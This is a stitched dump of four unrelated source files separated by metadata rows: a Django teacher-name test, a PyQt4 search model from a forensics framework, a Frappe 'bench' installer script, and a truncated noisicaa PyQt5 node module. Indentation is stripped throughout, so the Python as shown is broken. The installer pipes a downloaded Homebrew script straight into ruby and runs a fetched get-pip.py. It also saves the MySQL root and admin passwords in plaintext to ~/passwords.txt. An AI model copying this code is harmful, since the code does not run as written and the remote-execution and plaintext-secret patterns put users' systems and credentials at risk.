# designed to manage the core business of higher education institutions,
# such as universities, faculties, institutes and professional schools.
# The core business involves the administration of students, teachers,
# courses, programs and so on.
#
# Copyright (C) 2015-2020 Université catholique de Louvain (http://www.uclouvain.be)
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# A copy of this license - GNU General Public License - is available
# at the root of the source code of this program. If not,
# see http://www.gnu.org/licenses/.
#
##############################################################################
from django.test import SimpleTestCase
from attribution.tests.ddd.factories.teacher import TeacherFactory
class TestInitTeacher(SimpleTestCase):
def test_full_name_with_spaces(self):
obj = TeacherFactory(
last_name=" Truc",
first_name=" Machin",
middle_name=" Chose "
)
self.assertEqual(obj.full_name, 'TRUC Machin Chose')
def test_full_name_without_middle_name(self):
obj = TeacherFactory(
last_name=" Truc",
first_name=" Machin",
)
self.assertEqual(obj.full_name, 'TRUC Machin')
class TestTeacherHash(SimpleTestCase):
def test_assert_equals(self):
obj_1 = TeacherFactory(
last_name="Truc",
first_name="Machin",
middle_name="Chose"
)
obj_2 = TeacherFactory(
last_name="Truc",
first_name="Machin",
middle_name="Chose"
)
self.assertEqual(obj_1, obj_2)
def test_assert_not_equals(self):
obj_1 = TeacherFactory()
obj_2 = TeacherFactory()
self.assertNotEqual(obj_1, obj_2)
| agpl-3.0 | -4,446,630,505,314,006,000 | 34.043478 | 87 | 0.612903 | false |
halbbob/dff | api/gui/model/search_model.py | 1 | 16526 | # DFF -- An Open Source Digital Forensics Framework
# Copyright (C) 2009-2011 ArxSys
# This program is free software, distributed under the terms of
# the GNU General Public License Version 2. See the LICENSE file
# at the top of the source tree.
#
# See http://www.digital-forensic.org for more information about this
# project. Please do not directly contact any of the maintainers of
# DFF for assistance; the project provides a web site, mailing lists
# and IRC channels for your use.
#
# Author(s):
# Solal Jacob <[email protected]>
# Romain Bertholon <[email protected]>
#
from PyQt4.QtCore import SIGNAL, QAbstractItemModel, QModelIndex, QVariant, Qt, QDateTime, QSize, QThread, QMutex, QSemaphore
from PyQt4.QtGui import QColor, QIcon, QImage, QImageReader, QPixmap, QPixmapCache, QStandardItemModel, QStandardItem
from PyQt4 import QtCore
import re
from api.types.libtypes import Variant, vtime
from api.vfs.libvfs import VFS
from api.events.libevents import EventHandler
from Queue import *
class SearchModel(QAbstractItemModel, EventHandler):
"""
The VFSItemModel, inheriting QAbstractItemModel, is used by views of the node browser.
    Data are fetched directly in the VFS. In QTableView, only two columns are always displayed :
* nodes' names
* nodes' size
This is up to users to configure which columns they want to display, according to nodes'
attributes. The currently selected node's children are storedn in the list self.node_list
More documentation on QAbstractItemModel() can be found at :
* http://www.riverbankcomputing.co.uk/static/Docs/PyQt4/html/qabstractitemmodel.html
"""
def __init__(self, __parent = None, event=False, fm = False):
"""
Constructor.
"""
QAbstractItemModel.__init__(self, __parent)
EventHandler.__init__(self)
# init root + some values
self.rootItem = None
self.__parent = __parent
self.VFS = VFS.Get()
self.map = {}
self.imagesthumbnails = None
self.connect(self, SIGNAL("dataImage"), self.setDataImage)
self.translation()
self.fetchedItems = 0
self.thumbQueued = {}
self.fm = fm
self.fm = False
self.checkedNodes = set()
        # This list contains the children of the currently selected node.
self.node_list = []
        # list of headers the user chose to display.
self.header_list = []
self.type_list = []
self.disp_module = 0
self.del_sort = 0
self.cacheAttr = (None, None)
# connect the mode to the VFS to receive its events
if event:
self.VFS.connection(self)
def setFilterRegExp(self, regExp):
return
def Event(self, e):
"""
This method is called when an event is emitted by the VFS (when a node is added into the
        VFS for example, and the view needs to be redrawn).
"""
parent = self.rootItem
if parent != None:
self.node_list = parent.children()
# emit signals to redraw the gui
self.emit(SIGNAL("layoutAboutToBeChanged()"))
self.emit(SIGNAL("layoutChanged()"))
def setHeaderData(self, section, orientation, value, role):
"""
\reimp
Add a header data into the header. Emit a `layoutAboutToBeChanged` signal before adding the header
and `layoutChanged` once it is done.
"""
self.emit(SIGNAL("layoutAboutToBeChanged()"))
QAbstractItemModel.setHeaderData(self, section, orientation, value, role)
self.emit(SIGNAL("layoutChanged()"))
def setDataImage(self, index, node, image):
pixmap = QPixmap().fromImage(image)
pixmapCache.insert(str(node.this), pixmap)
self.__parent.currentView().update(index)
def imagesThumbnails(self):
return self.imagesthumbnails
def setRootPath(self, node, kompleter = None):
"""
Set the path of the root node.
"""
self.fetchedItems = 0
typeWorker.clear()
self.rootItem = node
if node != None:
self.sort(HNAME, Qt.AscendingOrder)
if kompleter == None:
self.emit(SIGNAL("rootPathChanged"), node)
self.reset()
def qMin(self, x, y):
"""
        Return `x` if it is inferior to `y`, `y` otherwise.
"""
if x < y:
return x
else:
return y
def rowCount(self, parent):
"""
        \return the number of child rows of the index `parent`.
"""
return len(self.node_list)
def headerData(self, section, orientation, role=Qt.DisplayRole):
"""
\reimp
        \return the header data whose role is `role`, or an invalid QVariant() if the data could
not be fetched.
"""
if role != Qt.DisplayRole:
return QVariant()
nb_s = section - 2 - self.disp_module - self.del_sort
if orientation == Qt.Horizontal:
if section == HNAME:
return QVariant(self.nameTr)
elif section == HSIZE:
return QVariant(self.sizeTr)
elif (self.disp_module != 0) and (section == HMODULE):
return QVariant(self.moduleTr)
elif (self.del_sort != 0):
if (self.disp_module != 0):
if (section == (HMODULE + 1)):
return QVariant(self.deletedTr)
elif section == HMODULE:
return QVariant(self.deletedTr)
if nb_s >= (len(self.header_list) + len(self.type_list)):
return QVariant()
elif nb_s >= len(self.header_list):
return QVariant(self.type_list[nb_s - len(self.header_list)])
else:
return QVariant(self.header_list[nb_s])
def data(self, index, role):
"""
\reimp
        Data which can be fetched differs from one view to another and also depends on the user's configuration.
        Each node's attributes can be displayed in views, or hidden, depending on what users want to
        display. The only two columns always displayed are the node's name and size (`HNAME` and `HSIZE`
        columns).
        The main types of information that can be displayed, in addition to names and sizes, are :
        * the name of the module that generated the node
        * the MAC time of the nodes (if any)
        * the mime-type of the node
        * all dynamic extended attributes of the node.
        * a flag indicating if the node is deleted or not
        Sorting can be performed on all the data by clicking in the corresponding header.
        \param index the index where the data is located
        \param role the role of the data
        \return the data whose index is `index` and role is `role`, or an invalid QVariant if
        the data is invalid.
"""
if not index.isValid():
return QVariant()
if index.row() > len(self.node_list) or index.row() < 0:
return QVariant()
node = self.node_list[index.row()]
column = index.column()
if role == Qt.DisplayRole :
# return name, size and eventually module columns
if column == HNAME:
return QVariant(node.name())
if column == HSIZE:
return QVariant(node.size())
if (self.disp_module != 0) and (column == HMODULE):
return QVariant(node.fsobj().name)
elif (self.del_sort != 0):
if (self.disp_module != 0):
if (column == (HMODULE + 1)):
return QVariant(node.isDeleted())
elif column == HMODULE:
return QVariant(node.isDeleted())
# return attributes and type columns
try :
nb_c = column - 2 - self.disp_module - self.del_sort
if nb_c >= (len(self.header_list) + len(self.type_list)):
return QVariant() # index error
elif nb_c >= len(self.header_list): # the data is a dataType
type = self.type_list[nb_c - len(self.header_list)]
possible_type = node.dataType().value()
return QVariant(possible_type[str(type)].value())
else:
if self.cacheAttr[0] != long(node.this):
self.cacheAttr = (long(node.this), node.fsoAttributes())
attr = self.cacheAttr[1]
value = attr[str(self.header_list[nb_c])]
val = value.value()
if val == None:
return QVariant(" N / A ")
if value.type() == 13:
return QVariant(QDateTime(val.get_time()))
else:
return QVariant(val)
except IndexError:
return QVariant()
return QVariant()
# returns data corresponding to the role passed in parameter to data() method (icon, background,
# etc.)
if role == Qt.ForegroundRole:
if column == 0:
if node.isDeleted():
return QVariant(QColor(Qt.red))
if role == Qt.DecorationRole:
if column == HNAME:
if not self.imagesthumbnails:
return QVariant(QIcon(node.icon()))
else:
mtype = str(node.dataType())
if mtype.find("broken") != -1:
return QVariant(QIcon(":file_broken.png"))
pixmap = pixmapCache.find(str(node.this))
if pixmap:
return QVariant(QIcon(pixmap))
elif typeWorker.isImage(mtype):
typeWorker.enqueue(self, index, node)
return QVariant(QIcon(":file_temporary.png"))
return QVariant(QIcon(node.icon()))
if role == Qt.CheckStateRole:
if column == HNAME:
if (long(node.this), 0) in self.checkedNodes:
if node.hasChildren():
return Qt.PartiallyChecked
else:
return Qt.Checked
elif (long(node.this), 1) in self.checkedNodes:
return Qt.Checked
else:
return Qt.Unchecked
return QVariant()
def setImagesThumbnails(self, flag):
"""
Set the image thumbnail.
"""
self.imagesthumbnails = flag
def columnCount(self, parent = QModelIndex()):
"""
\reimp
This number is variable, depending on the configuration.
\return the number of displayed columns (at least 2, name and size columns)
"""
# 2 is for columns names and sizes
return len(self.header_list) + 2 + len(self.type_list) \
+ self.disp_module + self.del_sort
def index(self, row, column, parent = QModelIndex()):
"""
\reimp
        Get the index located at row `row` and column `column`, whose parent is `parent`. Create the index
        if it does not exist by calling QAbstractItemModel.createIndex().
        \param row the row where the index should be located.
        \param column the column where the index should be located.
        \param parent the parent of the index (invalid QModelIndex by default, corresponding to root node).
        \return the index, or an invalid index if an error occurred.
"""
if not self.hasIndex(row, column, parent):
return QModelIndex()
if parent.isValid():
parentItem = self.VFS.getNodeFromPointer(parent.internalId())
else:
parentItem = self.rootItem
if row < len(self.node_list):
childItem = self.node_list[row]
else:
return QModelIndex()
index = self.createIndex(row, column, long(childItem.this))
return index
def parent(self, index):
"""
\reimp
        \return the parent index of `index` or an invalid QModelIndex if an error occurs.
"""
if not index.isValid():
return QModelIndex()
childItem = self.VFS.getNodeFromPointer(index.internalId())
parentItem = childItem.parent()
if parentItem.this == self.rootItem.this:
return QModelIndex()
index = self.createIndex(parentItem.at() , 0, long(parentItem.this))
return index
def hasChildren(self, parent):
"""
\reimp
        \return `True` if index `parent` has at least one child, `False` otherwise.
"""
if not parent.isValid():
self.parentItem = self.rootItem
return self.rootItem.hasChildren()
else:
self.parentItem = self.VFS.getNodeFromPointer(parent.internalId())
return self.parentItem.hasChildren()
def setData(self, index, value, role):
"""
\reimp
        Set the data whose value is `value` at index `index` with role `role`.
        \return `True` if no error occurred, `False` otherwise.
"""
if not index.isValid():
return QVariant()
if role == Qt.CheckStateRole:
column = index.column()
if column == HNAME:
node = self.VFS.getNodeFromPointer(index.internalId())
if value == Qt.Unchecked:
if (long(node.this), 0) in self.checkedNodes:
self.checkedNodes.remove((long(node.this), 0))
else:
self.checkedNodes.remove((long(node.this), 1))
elif value == Qt.PartiallyChecked:
self.checkedNodes.add((long(node.this), 0))
elif value == Qt.Checked:
if node.hasChildren():
if (long(node.this), 0) not in self.checkedNodes:
self.checkedNodes.add((long(node.this), 0))
else:
self.checkedNodes.remove((long(node.this), 0))
self.checkedNodes.add((long(node.this), 1))
else:
self.checkedNodes.add((long(node.this) , 1))
return True #return true if ok
def flags(self, flag):
"""
\reimp
\return the Qt.ItemFlags of the model.
"""
return (Qt.ItemIsSelectable | Qt.ItemIsUserCheckable | Qt.ItemIsTristate | Qt.ItemIsEnabled )
def dataTypeByKey(self, stype, node):
try:
return node.dataType().value()[str(stype)].value()
except IndexError:
return None
def fsoAttributesByKey(self, stype, node):
try:
val = node.fsoAttributes()[stype]
if isinstance(val.value(), vtime):
return val.value().get_time()
return val
except IndexError:
return Variant()
def sort(self, column, order):
"""
\reimp
Overload of the sort method used to sort data in the view, according to a given column.
        It calls the `sorted()` python built-in function, whose documentation can be found at :
        * http://wiki.python.org/moin/HowTo/Sorting/
        Emit a `layoutAboutToBeChanged()` signal before sorting, and a `layoutChanged()` signal once
        the sorting is finished. It can take a few seconds on large data volumes.
\param column the column on which the user wants to perform the sorting.
\param the order in which the user wants to sort (`Qt.DescendingOrder` or `Qt.AscendingOrder`).
"""
parentItem = self.rootItem
if parentItem == None:
return
children_list = parentItem.children()
if order == Qt.DescendingOrder:
Reverse = True
else:
Reverse = False
self.emit(SIGNAL("layoutAboutToBeChanged()"))
if column == HNAME: # sort by name
self.node_list = sorted(children_list, key=lambda Node: Node.name(), reverse=Reverse)
self.emit(SIGNAL("layoutChanged()"))
return
elif column == HSIZE: # sort be size
self.node_list = sorted(children_list, key=lambda Node: Node.size(), reverse=Reverse)
self.emit(SIGNAL("layoutChanged()"))
return
elif (self.disp_module == 1) and (column == HMODULE): # sort by module's name
self.node_list = sorted(children_list, key=lambda Node: Node.fsobj(), reverse=Reverse)
self.emit(SIGNAL("layoutChanged()"))
return
elif (self.del_sort != 0):
if (self.disp_module != 0):
                if (column == (HMODULE + 1)): # sort by deleted flag
self.node_list = sorted(children_list, key=lambda Node: Node.isDeleted(), reverse=Reverse)
self.emit(SIGNAL("layoutChanged()"))
return
elif column == HMODULE:
self.node_list = sorted(children_list, key=lambda Node: Node.isDeleted(), reverse=Reverse)
self.emit(SIGNAL("layoutChanged()"))
return
if (column - 2) >= (len(self.header_list) + len(self.type_list)): # default sorting if column is out of range
self.node_list = sorted(children_list, key=lambda Node: Node.name(), reverse=Reverse)
elif column - 2 >= len(self.header_list): # sorting on the mime type
type = self.type_list[column - 2 - len(self.header_list)]
self.node_list = sorted(children_list, \
key= lambda Node: self.dataTypeByKey(str(type), Node), \
reverse=Reverse)
else: # sort on an extended attribute.
self.node_list = sorted(children_list, \
key=lambda Node: self.fsoAttributesByKey(str(self.header_list[column - 2]), Node), \
reverse=Reverse)
self.emit(SIGNAL("layoutChanged()"))
def translation(self):
"""
Used for translating the framework.
"""
self.nameTr = self.tr('Name')
self.sizeTr = self.tr('Size')
self.ATimeTr = self.tr('Accessed time')
self.CTimeTr = self.tr('Changed time')
self.MTimeTr = self.tr('Modified time')
self.moduleTr = self.tr('Module')
self.deletedTr = self.tr('Deleted')
| gpl-2.0 | -762,149,715,988,854,500 | 33.645702 | 125 | 0.63863 | false |
bailabs/bench-v7 | install.py | 1 | 10678 | # wget setup_frappe.py | python
import os, sys, subprocess, getpass, json, multiprocessing, shutil, platform
from distutils.spawn import find_executable
tmp_bench_repo = '/tmp/bench-v7'
def install_bench(args):
check_distribution_compatibility()
check_brew_installed()
# pre-requisites for bench repo cloning
install_package('curl')
install_package('wget')
success = run_os_command({
'apt-get': [
'sudo apt-get update',
'sudo apt-get install -y git build-essential python-setuptools python-dev libffi-dev libssl-dev'
],
'yum': [
'sudo yum groupinstall -y "Development tools"',
'sudo yum install -y epel-release redhat-lsb-core git python-setuptools python-devel openssl-devel libffi-devel'
],
# epel-release is required to install redis, so installing it before the playbook-run.
# redhat-lsb-core is required, so that ansible can set ansible_lsb variable
})
if not find_executable("git"):
success = run_os_command({
'brew': 'brew install git'
})
if not success:
print 'Could not install pre-requisites. Please check for errors or install them manually.'
return
# secure pip installation
if find_executable('pip'):
run_os_command({
'yum': 'sudo pip install --upgrade setuptools pip',
'apt-get': 'sudo pip install --upgrade setuptools pip',
'brew': "sudo pip install --upgrade setuptools pip --user"
})
else:
if not os.path.exists("get-pip.py"):
run_os_command({
'apt-get': 'wget https://bootstrap.pypa.io/get-pip.py',
'yum': 'wget https://bootstrap.pypa.io/get-pip.py'
})
success = run_os_command({
'apt-get': 'sudo python get-pip.py',
'yum': 'sudo python get-pip.py',
})
if success:
run_os_command({
'pip': 'sudo pip install --upgrade pip setuptools',
})
# Restricting ansible version due to following bug in ansible 2.1
# https://github.com/ansible/ansible-modules-core/issues/3752
success = run_os_command({
'pip': "sudo pip install 'ansible==2.0.2.0'"
})
if not success:
could_not_install('Ansible')
# clone bench repo
if not args.run_travis:
clone_bench_repo(args)
if not args.user:
if args.production:
args.user = 'frappe'
elif os.environ.has_key('SUDO_USER'):
args.user = os.environ['SUDO_USER']
else:
args.user = getpass.getuser()
if args.user == 'root':
raise Exception('Please run this script as a non-root user with sudo privileges, but without using sudo or pass --user=USER')
# create user if not exists
extra_vars = vars(args)
extra_vars.update(frappe_user=args.user)
if os.path.exists(tmp_bench_repo):
repo_path = tmp_bench_repo
else:
repo_path = os.path.join(os.path.expanduser('~'), 'bench')
extra_vars.update(repo_path=repo_path)
run_playbook('develop/create_user.yml', extra_vars=extra_vars)
extra_vars.update(get_passwords(args.run_travis or args.without_bench_setup))
if args.production:
extra_vars.update(max_worker_connections=multiprocessing.cpu_count() * 1024)
branch = 'master' if args.production else 'master'
extra_vars.update(branch=branch)
if args.develop:
run_playbook('develop/install.yml', sudo=True, extra_vars=extra_vars)
elif args.production:
run_playbook('production/install.yml', sudo=True, extra_vars=extra_vars)
if os.path.exists(tmp_bench_repo):
shutil.rmtree(tmp_bench_repo)
def check_distribution_compatibility():
supported_dists = {'ubuntu': [14, 15, 16], 'debian': [7, 8],
'centos': [7], 'macos': [10.9, 10.10, 10.11, 10.12]}
dist_name, dist_version = get_distribution_info()
if dist_name in supported_dists:
if float(dist_version) in supported_dists[dist_name]:
return
print "Sorry, the installer doesn't support {0} {1}. Aborting installation!".format(dist_name, dist_version)
if dist_name in supported_dists:
print "Install on {0} {1} instead".format(dist_name, supported_dists[dist_name][-1])
sys.exit(1)
def get_distribution_info():
# return distribution name and major version
if platform.system() == "Linux":
current_dist = platform.dist()
return current_dist[0].lower(), current_dist[1].rsplit('.')[0]
elif platform.system() == "Darwin":
current_dist = platform.mac_ver()
return "macos", current_dist[0].rsplit('.', 1)[0]
def install_python27():
version = (sys.version_info[0], sys.version_info[1])
if version == (2, 7):
return
print 'Installing Python 2.7'
# install python 2.7
success = run_os_command({
'apt-get': 'sudo apt-get install -y python2.7',
'yum': 'sudo yum install -y python27',
'brew': 'brew install python'
})
if not success:
could_not_install('Python 2.7')
# replace current python with python2.7
os.execvp('python2.7', ([] if is_sudo_user() else ['sudo']) + ['python2.7', __file__] + sys.argv[1:])
def install_package(package):
package_exec = find_executable(package)
if not package_exec:
success = run_os_command({
'apt-get': ['sudo apt-get install -y {0}'.format(package)],
'yum': ['sudo yum install -y {0}'.format(package)]
})
else:
return
if not success:
could_not_install(package)
def check_brew_installed():
if 'Darwin' not in os.uname():
return
brew_exec = find_executable('brew')
if not brew_exec:
raise Exception('''
Please install brew package manager before proceeding with bench setup. Please run following
to install brew package manager on your machine,
/usr/bin/ruby -e "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/master/install)"
''')
def clone_bench_repo(args):
'''Clones the bench repository in the user folder'''
if os.path.exists(tmp_bench_repo):
return 0
elif args.without_bench_setup:
clone_path = os.path.join(os.path.expanduser('~'), 'bench')
else:
clone_path = tmp_bench_repo
branch = args.bench_branch or 'master'
repo_url = args.repo_url or 'https://github.com/bailabs/bench-v7.git'
success = run_os_command(
{'git': 'git clone {repo_url} {bench_repo} --depth 1 --branch {branch}'.format(
repo_url=repo_url, bench_repo=clone_path, branch=branch)}
)
return success
def run_os_command(command_map):
'''command_map is a dictionary of {'executable': command}. For ex. {'apt-get': 'sudo apt-get install -y python2.7'} '''
success = True
for executable, commands in command_map.items():
if find_executable(executable):
if isinstance(commands, basestring):
commands = [commands]
for command in commands:
returncode = subprocess.check_call(command, shell=True)
success = success and ( returncode == 0 )
break
return success
def could_not_install(package):
raise Exception('Could not install {0}. Please install it manually.'.format(package))
def is_sudo_user():
return os.geteuid() == 0
def get_passwords(ignore_prompt=False):
if not ignore_prompt:
mysql_root_password, admin_password = '', ''
pass_set = True
while pass_set:
# mysql root password
if not mysql_root_password:
mysql_root_password = getpass.unix_getpass(prompt='Please enter mysql root password: ')
conf_mysql_passwd = getpass.unix_getpass(prompt='Re-enter mysql root password: ')
if mysql_root_password != conf_mysql_passwd:
mysql_root_password = ''
continue
# admin password
if not admin_password:
admin_password = getpass.unix_getpass(prompt='Please enter the default Administrator user password: ')
conf_admin_passswd = getpass.unix_getpass(prompt='Re-enter Administrator password: ')
if admin_password != conf_admin_passswd:
admin_password = ''
continue
pass_set = False
else:
mysql_root_password = admin_password = 'travis'
passwords = {
'mysql_root_password': mysql_root_password,
'admin_password': admin_password
}
if not ignore_prompt:
passwords_file_path = os.path.join(os.path.expanduser('~'), 'passwords.txt')
with open(passwords_file_path, 'w') as f:
json.dump(passwords, f, indent=1)
print 'Passwords saved at ~/passwords.txt'
return passwords
def get_extra_vars_json(extra_args):
# We need to pass production as extra_vars to the playbook to execute conditionals in the
# playbook. Extra variables can passed as json or key=value pair. Here, we will use JSON.
json_path = os.path.join('/tmp', 'extra_vars.json')
extra_vars = dict(extra_args.items())
with open(json_path, mode='w') as j:
json.dump(extra_vars, j, indent=1, sort_keys=True)
return ('@' + json_path)
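# For illustration only, the generated /tmp/extra_vars.json might look like the
# following (actual keys and values depend on the command line):
#
#     {
#      "production": true,
#      "site": "site1.local",
#      "frappe_user": "frappe",
#      "verbosity": false
#     }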
def run_playbook(playbook_name, sudo=False, extra_vars=None):
args = ['ansible-playbook', '-c', 'local', playbook_name]
if extra_vars:
args.extend(['-e', get_extra_vars_json(extra_vars)])
if extra_vars.get('verbosity'):
args.append('-vvvv')
if sudo:
user = extra_vars.get('user') or getpass.getuser()
args.extend(['--become', '--become-user={0}'.format(user)])
if os.path.exists(tmp_bench_repo):
cwd = tmp_bench_repo
else:
cwd = os.path.join(os.path.expanduser('~'), 'bench')
success = subprocess.check_call(args, cwd=os.path.join(cwd, 'playbooks'))
return success
def parse_commandline_args():
import argparse
parser = argparse.ArgumentParser(description='Frappe Installer')
# Arguments develop and production are mutually exclusive both can't be specified together.
# Hence, we need to create a group for discouraging use of both options at the same time.
args_group = parser.add_mutually_exclusive_group()
args_group.add_argument('--develop', dest='develop', action='store_true', default=False,
help='Install developer setup')
args_group.add_argument('--production', dest='production', action='store_true',
default=False, help='Setup Production environment for bench')
parser.add_argument('--site', dest='site', action='store', default='site1.local',
help='Specifiy name for your first ERPNext site')
parser.add_argument('--verbose', dest='verbosity', action='store_true', default=False,
help='Run the script in verbose mode')
parser.add_argument('--user', dest='user', help='Install frappe-v7 for this user')
parser.add_argument('--bench-branch', dest='bench_branch', help='Clone a particular branch of bench repository')
parser.add_argument('--repo-url', dest='repo_url', help='Clone bench from the given url')
# To enable testing of script using Travis, this should skip the prompt
parser.add_argument('--run-travis', dest='run_travis', action='store_true', default=False,
help=argparse.SUPPRESS)
parser.add_argument('--without-bench-setup', dest='without_bench_setup', action='store_true', default=False,
help=argparse.SUPPRESS)
args = parser.parse_args()
return args
if __name__ == '__main__':
try:
import argparse
except ImportError:
# install python2.7
install_python27()
args = parse_commandline_args()
install_bench(args)
print '''Frappe/ERPNext has been successfully installed!'''
| gpl-3.0 | -1,744,825,575,128,492,300 | 29.249292 | 127 | 0.699569 | false |
diN0bot/ProcrasDonate | adwords/views/main.py | 1 | 2790 | import settings
from lib.view_utils import render_response, render_string, HttpResponseRedirect
from django.core.urlresolvers import reverse
from django.contrib.auth.decorators import user_passes_test
from adwords.models import *
def adword_page(request, group):
page = "landing"
return render_response(request, 'adwords/landing_pages/%s.html' % group, locals())
def adword_click(request, page, group):
return render_response(request, 'adwords/click_to_page_base.html', locals())
def adword_done(request, page, group):
return render_response(request, 'adwords/done_page.html', locals())
def adword_email_form(request, page, group):
if request.POST:
email = request.POST.get('email', None)
if email:
email = email.strip()
visitor = Visitor.add(group, page, email)
try:
# send email for recipient user to reset password
txt = render_string(request, 'adwords/email.txt', {'email': email,
'settings': settings,
'visitor': visitor,
'group': group,
'page': page})
visitor.send_email("Welcome to ProcrasDonate",
txt,
from_email=settings.EMAIL)
return HttpResponseRedirect(reverse('adword_done', args=(page, group)))
except:
Log.Error("Adword visitor::Problem sending thank you email to %s for %s \
(maybe email address does not exist?)" % (email, visitor), "adword")
return HttpResponseRedirect(reverse('adword_done', args=(page, group)))
@user_passes_test(lambda u: u.is_superuser)
def dashboard(request):
# table = rows of groups, with columns the total no. of emails registered per page
table = []
click_tos = Visitor.objects.all().values_list('email_page', flat=True).order_by().distinct()
# construct header row
header_row = ["Landing Page", "Total"]
for click_to in click_tos:
header_row.append(click_to)
table.append(header_row)
# construct rest of rows
groups = Visitor.objects.all().values_list('page_group', flat=True).order_by().distinct()
for group in groups:
row = [group, Visitor.objects.filter(page_group=group).count()]
for click_to in click_tos:
row.append(Visitor.objects.filter(email_page=click_to, page_group=group).count())
table.append(row)
return render_response(request, 'adwords/dashboard.html', locals())
| agpl-3.0 | 758,947,347,224,055,200 | 40.641791 | 96 | 0.574194 | false |
dennerlager/sepibrews | sepibrews/command.py | 1 | 2978 | import sys
import unittest
class Command():
"""Use factory method 'create(command_name)' to instantiate"""
def __init__(self, arguments, executionEngine):
self.arguments = arguments
self.executionEngine = executionEngine
def execute(self):
raise NotImplementedError()
class StartCommand(Command):
def execute(self):
self.executionEngine.execute()
class StopCommand(Command):
def execute(self):
self.executionEngine.stopExecution()
class QuitCommand(Command):
def execute(self):
self.executionEngine.stopExecution()
sys.exit()
class GetPvCommand(Command):
def execute(self):
return self.executionEngine.getTemperature()
class GetSvCommand(Command):
def execute(self):
return self.executionEngine.getSetValue()
class GetRemainingStepTimeCommand(Command):
def execute(self):
return self.executionEngine.getRemainingStepTime()
class GetTotalRemainingTimeCommand(Command):
def execute(self):
return self.executionEngine.getTotalRemainingTime()
class SetRecipeCommand(Command):
def execute(self):
return self.executionEngine.setRecipe(self.arguments[0])
commands = {'start': StartCommand,
'stop': StopCommand,
'quit': QuitCommand,
'getPv': GetPvCommand,
'getSv': GetSvCommand,
'getRemainingStepTime': GetRemainingStepTimeCommand,
'getTotalRemainingTime': GetTotalRemainingTimeCommand,
'setRecipe': SetRecipeCommand, }
def create(command_name, arguments, executionEngine):
try:
return commands[command_name](arguments, executionEngine)
except KeyError:
raise ValueError("no such command: {}".format(command_name))
class CommandCreationTest(unittest.TestCase):
def test_instantiate_raises(self):
self.assertRaises(ValueError, create, 'asdf', [], 'ee')
def test_startCommand(self):
self.assertIsInstance(create('start', [], 'ee'), StartCommand)
def test_stopCommand(self):
self.assertIsInstance(create('stop', [], 'ee'), StopCommand)
def test_quitCommand(self):
self.assertIsInstance(create('quit', [], 'ee'), QuitCommand)
def test_getPvCommand(self):
self.assertIsInstance(create('getPv', [], 'ee'), GetPvCommand)
def test_getSvCommand(self):
self.assertIsInstance(create('getSv', [], 'ee'), GetSvCommand)
def test_getRemainingStepTimeCommand(self):
self.assertIsInstance(create('getRemainingStepTime', [], 'ee'),
GetRemainingStepTimeCommand)
def test_getTotalRemainingTimeCommand(self):
self.assertIsInstance(create('getTotalRemainingTime', [], 'ee'),
GetTotalRemainingTimeCommand)
def test_setRecipe(self):
self.assertIsInstance(create('setRecipe', ['./recipes/test.csv'], 'ee'), SetRecipeCommand)
if __name__ == '__main__':
unittest.main()
| gpl-3.0 | -4,192,804,074,547,650,600 | 31.021505 | 98 | 0.671927 | false |
odahoda/noisicaa | noisicaa/ui/graph/base_node.py | 1 | 34059 | #!/usr/bin/python3
# @begin:license
#
# Copyright (c) 2015-2019, Benjamin Niemann <[email protected]>
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License along
# with this program; if not, write to the Free Software Foundation, Inc.,
# 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
#
# @end:license
import functools
import logging
import os.path
from typing import cast, Any, Optional, Dict, List, Iterable
from PyQt5.QtCore import Qt
from PyQt5 import QtCore
from PyQt5 import QtGui
from PyQt5 import QtSvg
from PyQt5 import QtWidgets
from noisicaa import constants
from noisicaa import audioproc
from noisicaa import core
from noisicaa import value_types
from noisicaa import music
from noisicaa import node_db
from noisicaa.ui import ui_base
from noisicaa.ui import mute_button
logger = logging.getLogger(__name__)
port_colors = {
node_db.PortDescription.UNDEFINED: QtGui.QColor(150, 150, 150),
node_db.PortDescription.AUDIO: QtGui.QColor(100, 255, 100),
node_db.PortDescription.ARATE_CONTROL: QtGui.QColor(100, 255, 180),
node_db.PortDescription.KRATE_CONTROL: QtGui.QColor(100, 180, 255),
node_db.PortDescription.EVENTS: QtGui.QColor(255, 180, 100),
}
class SelectColorAction(QtWidgets.QWidgetAction):
colorSelected = QtCore.pyqtSignal(value_types.Color)
def __init__(self, parent: QtCore.QObject) -> None:
super().__init__(parent)
self.setDefaultWidget(SelectColorWidget(parent=parent, action=self))
class ColorBox(QtWidgets.QWidget):
clicked = QtCore.pyqtSignal()
def __init__(self, color: value_types.Color, parent: QtWidgets.QWidget) -> None:
super().__init__(parent)
self.__color = color
self.setFixedSize(24, 24)
def paintEvent(self, event: QtGui.QPaintEvent) -> None:
super().paintEvent(event)
painter = QtGui.QPainter(self)
try:
painter.fillRect(self.rect(), Qt.black)
painter.fillRect(self.rect().adjusted(1, 1, -1, -1), Qt.white)
painter.fillRect(self.rect().adjusted(2, 2, -2, -2), QtGui.QColor.fromRgbF(
self.__color.r,
self.__color.g,
self.__color.b,
self.__color.a))
finally:
painter.end()
def mousePressEvent(self, event: QtGui.QMouseEvent) -> None:
if event.button() == Qt.LeftButton:
self.clicked.emit()
class SelectColorWidget(QtWidgets.QWidget):
colors = [
value_types.Color(0.7, 0.7, 0.7),
value_types.Color(0.8, 0.8, 0.8),
value_types.Color(0.9, 0.9, 0.9),
value_types.Color(1.0, 1.0, 1.0),
value_types.Color(1.0, 0.6, 0.6),
value_types.Color(1.0, 0.7, 0.7),
value_types.Color(1.0, 0.8, 0.8),
value_types.Color(1.0, 0.9, 0.9),
value_types.Color(1.0, 0.6, 0.1),
value_types.Color(1.0, 0.7, 0.3),
value_types.Color(1.0, 0.8, 0.6),
value_types.Color(1.0, 0.9, 0.8),
value_types.Color(0.6, 1.0, 0.6),
value_types.Color(0.7, 1.0, 0.7),
